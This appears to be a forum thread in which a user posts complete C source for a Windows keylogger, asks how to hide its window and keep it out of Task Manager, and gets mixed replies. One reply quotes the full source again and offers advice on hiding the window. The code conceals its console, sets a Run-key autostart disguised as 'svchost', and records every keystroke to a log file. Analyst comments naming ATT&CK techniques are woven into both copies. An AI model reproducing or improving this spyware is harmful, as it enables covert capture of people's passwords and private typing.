
Thread: Hidden Program

  1. #1
    Junior Member
    Join Date
    Jul 2004
    Posts
    19

    Hidden Program

    I have this keylogger in C++, courtesy of "lepricaun". It is a great program and works well, but the only problem is that a black box that looks like a DOS session appears. If you exit out of the box, you quit the keylogger. Is there a way of making it hidden? Here is the code:


    #include <windows.h>
    #include <stdio.h>
    #include <winuser.h>

    /* Size in bytes of the buffer test_key() hands to RegQueryValueEx. */
    #define BUFSIZE 80

    /* Forward declarations; the definitions follow main(). */
    int test_key(void);
    int create_key(char *);
    int get_keys(void);


    /*
     * Entry point of the posted sample.
     *
     * Visible behaviour, in order: allocate a console, look up a window of
     * class "ConsoleWindowClass" and call ShowWindow on it with 0 (SW_HIDE),
     * ask test_key() whether the "svchost" Run value exists, call create_key()
     * when test_key() returns 2, then run get_keys() and return its result.
     *
     * NOTE(review), for analysts: a console program that hides a console
     * window, registers an autostart value named after a Windows system binary
     * and then polls key state is a behaviour combination worth alerting on
     * (MITRE ATT&CK T1547.001 and T1056.001). The name "svchost" is chosen by
     * the sample; the genuine svchost.exe is started by the service control
     * manager, not from a Run value.
     */
    int main(void)
    {
    HWND stealth; /*creating stealth (window is not visible)*/
    AllocConsole();
    /* NULL window name: the lookup is by window class only. */
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);

    /* create receives create_key()'s result below but is never read. */
    int test,create;
    test=test_key();/*check if key is available for opening*/

    if (test==2)/*create key*/
    {
    /* The literal text c:\%windir%\svchost.exe is handed to create_key(),
       which stores it as REG_SZ; that exact string is the value data to
       look for when hunting for this entry. */
    char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
    create=create_key(path);

    }


    /* get_keys() only returns on a log-file open failure (value 1). */
    int t=get_keys();

    return t;
    }

    /*
     * Polling loop that appends detected key presses to "svchost.log".
     *
     * Scans virtual-key codes 8..222 forever. A code is logged when
     * GetAsyncKeyState() returns exactly -32767 (0x8001 as a SHORT: key down
     * and pressed since the previous call). The log file is opened in append
     * mode ("a+", a path relative to the current directory) and closed again
     * for every logged key.
     *
     * Returns 1 if the log file cannot be opened. The trailing
     * "return EXIT_SUCCESS" is never reached, because while(1) is left only
     * through that return.
     *
     * NOTE(review), for analysts: a process that calls GetAsyncKeyState across
     * the whole key range in a loop, together with repeated appends to a file
     * called svchost.log, is the observable footprint of this routine.
     */
    int get_keys(void)
    {
    short character;
    while(1)
    {

    for(character=8;character<=222;character++)
    {
    if(GetAsyncKeyState(character)==-32767)
    {

    FILE *file;
    file=fopen("svchost.log","a+");
    if(file==NULL)
    {
    return 1;
    }
    /* Always true here: the NULL case returned just above. */
    if(file!=NULL)
    {
    /* Codes 39..64 are written as the raw code value. This break leaves
       the for loop, so the scan restarts at code 8. */
    if((character>=39)&&(character<=64))
    {
    fputc(character,file);
    fclose(file);
    break;
    }
    /* Codes 65..90 get 32 added before being written, i.e. the lower-case
       ASCII letter; the shift state is not consulted. This break also
       leaves the for loop. */
    else if((character>64)&&(character<91))
    {
    character+=32;
    fputc(character,file);
    fclose(file);
    break;
    }
    else
    {
    /* Every break inside this switch leaves only the switch; the for loop
       then continues with the next code. */
    switch(character)
    {
    case VK_SPACE:
    fputc(' ',file);
    fclose(file);
    break;
    case VK_SHIFT:
    fputs("[SHIFT]",file);
    fclose(file);
    break;
    case VK_RETURN:
    fputs("\n[ENTER]",file);
    fclose(file);
    break;
    case VK_BACK:
    fputs("[BACKSPACE]",file);
    fclose(file);
    break;
    case VK_TAB:
    fputs("[TAB]",file);
    fclose(file);
    break;
    case VK_CONTROL:
    fputs("[CTRL]",file);
    fclose(file);
    break;
    case VK_DELETE:
    fputs("[DEL]",file);
    fclose(file);
    break;
    case VK_OEM_1:
    fputs("[;:]",file);
    fclose(file);
    break;
    case VK_OEM_2:
    fputs("[/?]",file);
    fclose(file);
    break;
    case VK_OEM_3:
    fputs("[`~]",file);
    fclose(file);
    break;
    case VK_OEM_4:
    fputs("[ [{ ]",file);
    fclose(file);
    break;
    case VK_OEM_5:
    fputs("[\\|]",file);
    fclose(file);
    break;
    case VK_OEM_6:
    fputs("[ ]} ]",file);
    fclose(file);
    break;
    case VK_OEM_7:
    fputs("['\"]",file);
    fclose(file);
    break;
    /*case VK_OEM_PLUS:
    fputc('+',file);
    fclose(file);
    break;
    case VK_OEM_COMMA:
    fputc(',',file);
    fclose(file);
    break;
    case VK_OEM_MINUS:
    fputc('-',file);
    fclose(file);
    break;
    case VK_OEM_PERIOD:
    fputc('.',file);
    fclose(file);
    break;*/
    case VK_NUMPAD0:
    fputc('0',file);
    fclose(file);
    break;
    case VK_NUMPAD1:
    fputc('1',file);
    fclose(file);
    break;
    case VK_NUMPAD2:
    fputc('2',file);
    fclose(file);
    break;
    case VK_NUMPAD3:
    fputc('3',file);
    fclose(file);
    break;
    case VK_NUMPAD4:
    fputc('4',file);
    fclose(file);
    break;
    case VK_NUMPAD5:
    fputc('5',file);
    fclose(file);
    break;
    case VK_NUMPAD6:
    fputc('6',file);
    fclose(file);
    break;
    case VK_NUMPAD7:
    fputc('7',file);
    fclose(file);
    break;
    case VK_NUMPAD8:
    fputc('8',file);
    fclose(file);
    break;
    case VK_NUMPAD9:
    fputc('9',file);
    fclose(file);
    break;
    case VK_CAPITAL:
    fputs("[CAPS LOCK]",file);
    fclose(file);
    break;
    /* Any other code: nothing is written, the file is just closed. */
    default:
    fclose(file);
    break;
    }
    }
    }
    }
    }

    }
    return EXIT_SUCCESS;
    }

    /*
     * Checks whether HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run holds
     * a value named "svchost".
     *
     * Returns 1 if the Run key cannot be opened with KEY_QUERY_VALUE, 2 if the
     * value query fails, and 0 if the query succeeds. The key handle is closed
     * on the paths where it was opened.
     */
    int test_key(void)
    {
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;

    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {
    check=1;
    return check;
    }

    reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);

    /* The buf_length test does not change the result: whenever reg_key is 0
       the next if overwrites check with 0. */
    if((reg_key!=0)||(buf_length>BUFSIZE))
    check=2;
    if(reg_key==0)
    check=0;

    RegCloseKey(hKey);
    return check;
    }

    /*
     * Writes the autostart entry: sets the value "svchost" (REG_SZ) under
     * HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to the string in path.
     *
     * path: NUL-terminated string stored as the value data; strlen(path) is
     *       passed as the data size.
     * Returns 0 if RegCreateKey succeeded and 1 otherwise. The result of
     * RegSetValueEx is not checked, so 0 does not prove the value was written.
     * hkey is not closed in this function.
     *
     * NOTE(review), for defenders: the Run key is a standard autostart
     * location (MITRE ATT&CK T1547.001). Registry auditing or Sysmon registry
     * events (IDs 12 and 13) on this key will surface the write. Writing under
     * HKEY_LOCAL_MACHINE normally needs administrative rights.
     */
    int create_key(char *path)
    {
    int reg_key,check;

    HKEY hkey;

    reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
    if(reg_key==0)
    {
    RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
    check=0;
    return check;
    }
    if(reg_key!=0)
    check=1;

    return check;
    }



    Also is there a way i can make it to where it is not on the task manager? If you can, please help me.

  2. #2
    Hoopy Frood
    Join Date
    Jun 2004
    Posts
    662
    Have you learned nothing from your previous posts? A question like this will only make you go into the Negative antipoints. Before your questions will be answered without flames and negs you will have to earn our respect so that we know that you mean no harm. Antionline is a site devoted to security and protecting against skiddies such as you seem to be. If you can't shape up and become a positive member, I cordially ask that you leave.

    Regards,
    Xierox
    "Personality is only ripe when a man has made the truth his own."

    -- Søren Kierkegaard

  3. #3
    er0k
    Guest
    The only thing wrong with the post is that he reposted code, which was just annoying. Poop > refer to lepricaun (sp?)'s post; they are having a discussion about your question in there.

  4. #4
    Hoopy Frood
    Join Date
    Jun 2004
    Posts
    662
    3 out of the 5 threads started by Poop deal with questionable activity. Don't you think we should be more wary about teaching him until we know his intent? Just my 2 cents.

    Regards,
    Xierox
    "Personality is only ripe when a man has made the truth his own."

    -- Søren Kierkegaard

  5. #5
    Senior Member
    Join Date
    Apr 2004
    Posts
    1,024
    How/why is this questionable? The guy/kid/whatever is trying to get something that another member posted to work the way it is supposed to. If Poop gets negged for this, then leprican should get negged for making a keylogger and posting it on here.
    [H]ard|OCP <--Best hardware/gaming news out there--|
    pwned.nl <--Gamers will love this one --|
    Light a man a fire and you'll keep him warm for a day, Light a man ON fire and you'll keep him warm the rest of his life.

  6. #6
    Macht Nicht Aus moxnix's Avatar
    Join Date
    May 2002
    Location
    Huson Mt.
    Posts
    1,752
    "Life should NOT be a journey to the grave with the intention of arriving safely in an attractive and well preserved body, but rather to skid in sideways, Champagne in one hand - strawberries in the other, body thoroughly used up, totally worn out and screaming WOO HOO - What a Ride!"
    Author Unknown

  7. #7
    I would have to agree with The Grunt. I would have to say poop has a point. I have never used a keylogger that hasn't run in the background or be hidden in the running processes.

    <start bad pun>'scripts don't hack systems, people hack systems'<end bad pun>

  8. #8
    Antionline is a site devoted to security and protecting against skiddies such as you seem to be. If you can't shape up and become a positive member, I cordially ask that you leave.
    And why is that? A keylogger is very much a big part of security.


    As for The_Grunt, since when has posting code been a bad thing? I personally think it is bad not to post code.

    Why is it that posting a Keylogger is a bad thing?


    Please enlighten me.

    To the original poster: when you have questions on code, contacting the person who wrote the code, if you can at all, would be the wisest course of action.

  9. #9

    Re: Hidden Program

    The problem might be as in what you think the code was written in... even though they use the same headers, the code is C, not C++... try compiling as KeyLogger.c, it should work as it was intended, without a cmd prompt open. It does for me and I only see it as a system process.

    Originally posted here by Poop782
    I have this keylogger in C++, courtesy of "lepricaun". It is a great program and works well, but the only problem is that a black box that looks like a DOS session appears. If you exit out of the box, you quit the keylogger. Is there a way of making it hidden? Here is the code:


    #include &lt;windows.h&gt;
    #include &lt;stdio.h&gt;
    #include &lt;winuser.h&gt;

    /* Size in bytes of the buffer test_key() hands to RegQueryValueEx. */
    #define BUFSIZE 80

    /* Forward declarations; the definitions follow main(). */
    int test_key(void);
    int create_key(char *);
    int get_keys(void);


    /*
     * Entry point of the quoted sample.
     *
     * Visible behaviour, in order: allocate a console, look up a window of
     * class "ConsoleWindowClass" and call ShowWindow on it with 0 (SW_HIDE),
     * call test_key(), call create_key() when test_key() returns 2, then run
     * get_keys() and return its result.
     *
     * NOTE(review), for analysts: hiding a console window, registering a Run
     * value named "svchost" and polling key state together form the
     * behavioural signature of this sample. The genuine svchost.exe is started
     * by the service control manager, not from a Run value.
     */
    int main(void)
    {
    HWND stealth; /*creating stealth (window is not visible)*/
    AllocConsole();
    /* NULL window name: the lookup is by window class only. */
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);

    /* create receives create_key()'s result below but is never read. */
    int test,create;
    test=test_key();/*check if key is available for opening*/

    if (test==2)/*create key*/
    {
    /* The literal text c:\%windir%\svchost.exe is what create_key() receives
       and stores as REG_SZ value data. */
    char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
    create=create_key(path);

    }


    /* get_keys() only returns on a log-file open failure (value 1). */
    int t=get_keys();

    return t;
    }

    /*
     * Polling loop that appends detected key presses to "svchost.log".
     *
     * Scans virtual-key codes 8..222 forever and logs a code when
     * GetAsyncKeyState() returns exactly -32767 (0x8001 as a SHORT: key down
     * and pressed since the previous call). The log file is opened with "a+"
     * and closed again for every logged key. Returns 1 if the file cannot be
     * opened; the trailing "return EXIT_SUCCESS" is never reached.
     *
     * NOTE(review): the "&lt;" and "&gt;" sequences in this quoted copy are
     * HTML-escaped '<' and '>' left behind by the forum quote.
     */
    int get_keys(void)
    {
    short character;
    while(1)
    {

    for(character=8;character&lt;=222;character++)
    {
    if(GetAsyncKeyState(character)==-32767)
    {

    FILE *file;
    file=fopen("svchost.log","a+");
    if(file==NULL)
    {
    return 1;
    }
    /* Always true here: the NULL case returned just above. */
    if(file!=NULL)
    {
    /* Codes 39..64 are written as the raw code value; this break leaves the
       for loop, so the scan restarts at code 8. */
    if((character&gt;=39)&&(character&lt;=64))
    {
    fputc(character,file);
    fclose(file);
    break;
    }
    /* Codes 65..90 get 32 added before being written (lower-case ASCII
       letter); this break also leaves the for loop. */
    else if((character&gt;64)&&(character&lt;91))
    {
    character+=32;
    fputc(character,file);
    fclose(file);
    break;
    }
    else
    {
    /* Breaks inside this switch leave only the switch, not the for loop. */
    switch(character)
    {
    case VK_SPACE:
    fputc(' ',file);
    fclose(file);
    break;
    case VK_SHIFT:
    fputs("[SHIFT]",file);
    fclose(file);
    break;
    case VK_RETURN:
    fputs("\n[ENTER]",file);
    fclose(file);
    break;
    case VK_BACK:
    fputs("[BACKSPACE]",file);
    fclose(file);
    break;
    case VK_TAB:
    fputs("[TAB]",file);
    fclose(file);
    break;
    case VK_CONTROL:
    fputs("[CTRL]",file);
    fclose(file);
    break;
    case VK_DELETE:
    fputs("[DEL]",file);
    fclose(file);
    break;
    case VK_OEM_1:
    fputs("[;:]",file);
    fclose(file);
    break;
    case VK_OEM_2:
    fputs("[/?]",file);
    fclose(file);
    break;
    case VK_OEM_3:
    fputs("[`~]",file);
    fclose(file);
    break;
    case VK_OEM_4:
    fputs("[ [{ ]",file);
    fclose(file);
    break;
    case VK_OEM_5:
    fputs("[\\|]",file);
    fclose(file);
    break;
    case VK_OEM_6:
    fputs("[ ]} ]",file);
    fclose(file);
    break;
    case VK_OEM_7:
    fputs("['\"]",file);
    fclose(file);
    break;
    /*case VK_OEM_PLUS:
    fputc('+',file);
    fclose(file);
    break;
    case VK_OEM_COMMA:
    fputc(',',file);
    fclose(file);
    break;
    case VK_OEM_MINUS:
    fputc('-',file);
    fclose(file);
    break;
    case VK_OEM_PERIOD:
    fputc('.',file);
    fclose(file);
    break;*/
    case VK_NUMPAD0:
    fputc('0',file);
    fclose(file);
    break;
    case VK_NUMPAD1:
    fputc('1',file);
    fclose(file);
    break;
    case VK_NUMPAD2:
    fputc('2',file);
    fclose(file);
    break;
    case VK_NUMPAD3:
    fputc('3',file);
    fclose(file);
    break;
    case VK_NUMPAD4:
    fputc('4',file);
    fclose(file);
    break;
    case VK_NUMPAD5:
    fputc('5',file);
    fclose(file);
    break;
    case VK_NUMPAD6:
    fputc('6',file);
    fclose(file);
    break;
    case VK_NUMPAD7:
    fputc('7',file);
    fclose(file);
    break;
    case VK_NUMPAD8:
    fputc('8',file);
    fclose(file);
    break;
    case VK_NUMPAD9:
    fputc('9',file);
    fclose(file);
    break;
    case VK_CAPITAL:
    fputs("[CAPS LOCK]",file);
    fclose(file);
    break;
    /* Any other code: nothing is written, the file is just closed. */
    default:
    fclose(file);
    break;
    }
    }
    }
    }
    }

    }
    return EXIT_SUCCESS;
    }

    /*
     * Checks whether HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run holds
     * a value named "svchost".
     *
     * Returns 1 if the Run key cannot be opened with KEY_QUERY_VALUE, 2 if the
     * value query fails, and 0 if the query succeeds.
     *
     * NOTE(review): "&gt;" below is an HTML-escaped '>' left behind by the
     * forum quote.
     */
    int test_key(void)
    {
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;

    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {
    check=1;
    return check;
    }

    reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);

    /* The buf_length test does not change the result: whenever reg_key is 0
       the next if overwrites check with 0. */
    if((reg_key!=0)||(buf_length&gt;BUFSIZE))
    check=2;
    if(reg_key==0)
    check=0;

    RegCloseKey(hKey);
    return check;
    }

    /*
     * Writes the autostart entry: sets the value "svchost" (REG_SZ) under
     * HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to the string in path.
     *
     * path: NUL-terminated string stored as the value data; strlen(path) is
     *       passed as the data size.
     * Returns 0 if RegCreateKey succeeded and 1 otherwise. The result of
     * RegSetValueEx is not checked, and hkey is not closed in this function.
     *
     * NOTE(review), for defenders: writes to this Run key are a standard
     * persistence indicator (MITRE ATT&CK T1547.001), and registry auditing on
     * the key will surface them.
     */
    int create_key(char *path)
    {
    int reg_key,check;

    HKEY hkey;

    reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
    if(reg_key==0)
    {
    RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
    check=0;
    return check;
    }
    if(reg_key!=0)
    check=1;

    return check;
    }



    Also is there a way i can make it to where it is not on the task manager? If you can, please help me.

  10. #10
    Junior Member
    Join Date
    Jul 2004
    Posts
    19
    it didn't work, the box is still coming up and not going away
